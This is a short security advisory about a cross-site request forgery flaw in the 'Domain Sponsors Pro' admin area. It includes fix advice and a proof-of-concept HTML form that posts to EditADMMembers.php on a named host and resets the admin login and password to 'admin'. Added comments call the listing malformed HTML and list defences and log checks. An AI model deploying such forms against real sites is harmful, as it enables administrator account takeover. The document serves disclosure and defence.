< ------------------- header data start ------------------- >

#############################################################

# Application Name :Domain Sponsors Pro

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Impact : Admin Bilgileri Degistirilebilir. (The administrator's account details can be changed.)

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. (Add a session token to the form and require the old password before the change is accepted.)

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<!--
  Sample form published with the advisory, kept exactly as listed.
  It posts an edit of a member record to the admin page EditADMMembers.php.
  The advisory classifies the issue as XSRF: the form as listed carries no
  session-bound token field and no field for the existing password, which are
  the two things the advisory's fix advice asks for.
  NOTE(review): attribute values are unquoted and the onclick handlers use
  typographic quotes, so the listing is not well-formed HTML.
-->
<form method=POST action=http://www.blizsoft.com/domains/adminy/EditADMMembers.php name=Members>
<!-- New login name and password travel as ordinary form fields; nothing here asks for the current password. -->
<input type=text name=member_login maxlength=15 value=admin size=15>
<input type=text name=member_password maxlength=15 value=admin size=15>
<!-- Remaining profile fields are submitted empty. -->
<input type=text name=first_name maxlength=20 value= size=20>
<input type=text name=last_name maxlength=20 value= size=20>
<input type=text name=email maxlength=30 value= size=30>
<input type=text name=phone maxlength=20 value= size=20>
<!-- FormAction is preset to "update"; presumably the server uses it to pick the operation (update / delete / cancel). Confirm against the application. -->
<input type=hidden value=update name=FormAction/>
<input type=submit value=update onclick=document.Members.FormAction.value = ’update’;/>
<input type=submit value=delete onclick=document.Members.FormAction.value = ’delete’;/>
<input type=submit value=Cancel onclick=document.Members.FormAction.value = ’cancel’;/>
<input type=hidden name=FormName value=Members/>
<!-- Record identifiers are fixed at 1; presumably the administrator account, in line with the advisory's impact statement. -->
<input type=hidden name=PK_member_id value=1/>
<input type=hidden name=member_id value=1/>
</form>
<!--
  Defensive review points for the receiving page:
  - Require an unpredictable, per-session token in every state-changing form and
    verify it server-side before acting on FormAction.
  - Require the current password before accepting a new member_login or member_password.
  - Check the Origin / Referer header on POSTs to the admin area and set the session
    cookie with the SameSite attribute as defence in depth.
  - For detection, look in web logs for POSTs to EditADMMembers.php whose Referer or
    Origin is not the application's own host.
-->
< -- bug code end of -- >